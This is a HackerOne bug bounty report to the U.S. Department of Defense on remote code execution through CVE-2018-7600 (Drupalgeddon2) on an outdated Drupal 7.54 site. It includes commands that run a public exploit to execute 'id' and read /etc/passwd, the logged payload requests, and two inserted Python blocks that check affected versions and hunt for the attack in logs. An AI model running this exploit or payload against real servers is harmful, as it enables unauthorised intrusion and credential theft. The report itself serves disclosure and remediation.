hackerone mvsashi H1:1063256
History: Dec 21, 2020 - 7:51 a.m.

U.S. Dept Of Defense: [CVE-2018-7600] Remote Code Execution due to outdated Drupal server on www.█████████

2020-12-21 07:51:14
mvsashi
hackerone.com
724

CVSS3: 9.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.5 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.976 High
  Percentile: 100.0%

Summary

Due to an outdated Drupal version, remote code execution is possible on www.█████ via CVE-2018-7600.

Description

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
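For defenders triaging an inventory against the affected ranges quoted in the Description above, here is an added Python example; it is not part of the report, the Drupalgeddon2 tool, or Drupal itself. It encodes exactly the four ranges the Description states (before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, 8.5.x before 8.5.1) and, as an assumption, parses the "Drupal X.Y, YYYY-MM-DD" header line that Drupal 7's CHANGELOG.txt uses; the sample changelog text is constructed.

```python
"""Flag Drupal core versions in the CVE-2018-7600 (SA-CORE-2018-002) affected
ranges. Added example for version triage; not code from the report or from
Drupal. The CHANGELOG.txt header format is an assumption; sample is constructed."""

import re

# (first affected version, first fixed version) per branch, exactly as the
# CVE description lists them. Versions compare as (major, minor, patch).
AFFECTED_RANGES = [
    ((7, 0, 0), (7, 58, 0)),   # Drupal 7 before 7.58
    ((8, 0, 0), (8, 3, 9)),    # 8.x before 8.3.9 (covers 8.0-8.3)
    ((8, 4, 0), (8, 4, 6)),    # 8.4.x before 8.4.6
    ((8, 5, 0), (8, 5, 1)),    # 8.5.x before 8.5.1
]

# Constructed sample in Drupal 7 CHANGELOG.txt style (assumed format).
SAMPLE_CHANGELOG = """
Drupal 7.54, 2017-02-01
-----------------------
- Fixed a minor issue (constructed entry).

Drupal 7.53, 2016-12-07
-----------------------
- Fixed another issue (constructed entry).
"""

VERSION_RE = re.compile(r"\b(\d+)\.(\d+)(?:\.(\d+))?")
CHANGELOG_RE = re.compile(r"^Drupal (\d+\.\d+(?:\.\d+)?),\s*(\d{4}-\d{2}-\d{2})", re.M)


def parse_version(text):
    """Turn '7.54' or '8.4.5' into a comparable (major, minor, patch) tuple."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(version):
    """True when the version lies in any of the affected half-open ranges."""
    v = parse_version(version) if isinstance(version, str) else tuple(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def version_from_changelog(text):
    """Return (version, release_date) from the first changelog header line."""
    m = CHANGELOG_RE.search(text)
    return (m.group(1), m.group(2)) if m else None


def assess_changelog(text):
    """Combine both steps: which version the changelog advertises and whether
    it falls in the CVE-2018-7600 ranges."""
    found = version_from_changelog(text)
    if found is None:
        return None
    version, released = found
    return {"version": version, "released": released, "affected": is_affected(version)}


if __name__ == "__main__":
    print(assess_changelog(SAMPLE_CHANGELOG))
```

The ranges are half-open on purpose: the first fixed release of each branch is excluded, so 7.58, 8.3.9, 8.4.6 and 8.5.1 report as not affected while everything older on that branch does. Branches later than 8.5 are outside the Description's scope and report as not affected.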

Vulnerable Host:

  • www.███

Visiting https://www.███/███ we can see that we have a Drupal with version 7.54, which was updated the last time in 2017-02-01.

There are several critical and highly critical vulnerabilities known for this version (see https://api.drupal.org/api/drupal/████████/7.x and https://www.drupal.org/security). Among them is SA-CORE-2018-002 (CVE-2018-7600), which I will demonstrate here.

Note: I am reporting this here, since the page https://www.███████ seems to belong to the █████████, which belongs to the DOD. The footer further states: ██████. [...]

Step-by-step Reproduction Instructions

  1. Download the git repository with the exploit: git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2
     • Install dependencies if necessary: gem install nokogiri
  2. Run the exploit with ruby: ruby drupalgeddon2-customizable-beta.rb -u https://www.████████/ -v 7 -c id --form user/login

Parameter explanation:

-u,     --url URL           Service URL
-v,     --version VERSION   Target Drupal version {7,8}
-c,     --command COMMAND   Command to execute
--form  Form to attack, by default '/user/password' in Drupal 7 

The above command outputs:

root@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.████/ -v 7 -c id --form user/login
drupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete
[i] Requesting: www.███████//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup
[i] POST: form_id=user_pass&_triggering_element_name=name
[i] 200
[*] Obtained build id!: ████████
drupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete
drupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete
[i] Requesting: www.█████/file/ajax/name/%23value/██████
[i] POST: form_build_id=█████
[i] Response code: 200
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
root@5b08dc005375:/Drupalgeddon2# 

As we can see, we successfully executed the id command, which responded with uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0.
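The two requests logged above are the signal a defender can hunt for: a request to the password-reset form carrying percent-encoded render-array property names (name[%23post_render][], name[%23markup], name[%23type]), followed by a POST to file/ajax/name/%23value/<build id>. The following added Python example, which is not part of the report or of the Drupalgeddon2 tool, scans Apache combined-format access log lines for those properties in the request target. The log format is an assumption, and every sample line, IP address and build id is constructed.

```python
"""Hunt for CVE-2018-7600 request patterns in web server access logs.
Added defender-side example; not code from the report or from the exploit tool.
Apache combined log format is assumed; all sample lines are constructed."""

import re
from urllib.parse import unquote

# Constructed sample: two lines mirroring the report's request pattern,
# two benign lines. IPs and the build id are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Dec/2020:07:40:01 +0000] "GET /user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [21/Dec/2020:07:40:02 +0000] "POST /file/ajax/name/%23value/form-CONSTRUCTED HTTP/1.1" 200 1700 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Dec/2020:07:41:00 +0000] "GET /user/password HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Dec/2020:07:41:30 +0000] "GET /node/12?page=2 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Render-array properties seen in the report's requests plus two common
# Drupal render properties; extend the list as your own hunting requires.
RENDER_KEY_RE = re.compile(
    r"#(?:post_render|pre_render|lazy_builder|markup|type|value|access_callback)\b"
)


def decode_target(target, rounds=2):
    """Percent-decode up to `rounds` times so %23 and %2523 both become '#'."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def suspicious_render_keys(target):
    """Return the render-array property names found in a request target, in
    order of first appearance. Browsers never send the URL fragment, so a
    literal '#' in a logged target is already abnormal; a render property
    after it is the CVE-2018-7600 tell."""
    return list(dict.fromkeys(RENDER_KEY_RE.findall(decode_target(target))))


def scan(log_text):
    """Parse each log line and keep those whose target carries render keys."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        keys = suspicious_render_keys(m.group("target"))
        if keys:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "keys": keys,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["target"]} -> {hit["keys"]}')
```

A 200 response on a matching line does not by itself prove success (the ajax callback returns 200 either way), so treat matches as leads for host-side review of the web server account's activity, and pair the hunt with the version check: a patched site strips such keys from input, while an outdated one, as this report shows, executes them.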

I am also providing the output of /etc/passwd, which I obtained with the command:

ruby drupalgeddon2-customizable-beta.rb -u https://www.██████/ -v 7 -c "cat /etc/passwd" --form user/login

Output:

████
██████
███████
████████
█████████
█████████
██████████
███
████
█████████
██████████
████
██████████
████████ █████
█████████
██████████
████████
██████████
██████
████
█████████
███████
███████
████
██████████
███
█████
█████
██████

Resources

Mitigation/Remediation Actions

Upgrade to the most recent version of Drupal 7 core.

Impact

Critical - Remote Code Execution
